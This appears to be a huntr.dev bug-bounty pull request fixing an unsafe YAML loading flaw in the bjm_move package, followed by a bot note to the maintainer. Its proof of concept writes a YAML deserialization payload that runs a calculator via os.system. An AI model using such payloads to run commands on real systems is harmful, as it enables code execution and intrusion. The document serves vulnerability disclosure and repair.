Fixed Arbitary Code Execution

[Anon-Artist]

📊 Metadata *

bjm_move package is vulnerable to Arbitrary Code Execution.

Bounty URL: https://www.huntr.dev/bounties/1-other-bjm_move

⚙️ Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

import os
os.system('git clone https://github.com/lynchmv/bjm_move')
os.chdir('bjm_move/')

payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('calc.exe')"
"""
open('db_config.yml','w+').write(payload)
os.system('python3 bjm_db.py')

Execute the commands in another terminal:

python3 exploit.py

xcalc will pop up.

🔥 Proof of Fix (PoF) *

After fix it will not popup a calc.

👍 User Acceptance Testing (UAT)

After fix functionality is unaffected.

🔗 Relates to...

https://www.huntr.dev/bounties/1-other-bjm_move

[huntr-helper]

👋 Hello, @lynchmv - @Anon-Artist has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@lynchmv & @Anon-Artist - thank you for your efforts in securing the world’s open source code! 🎉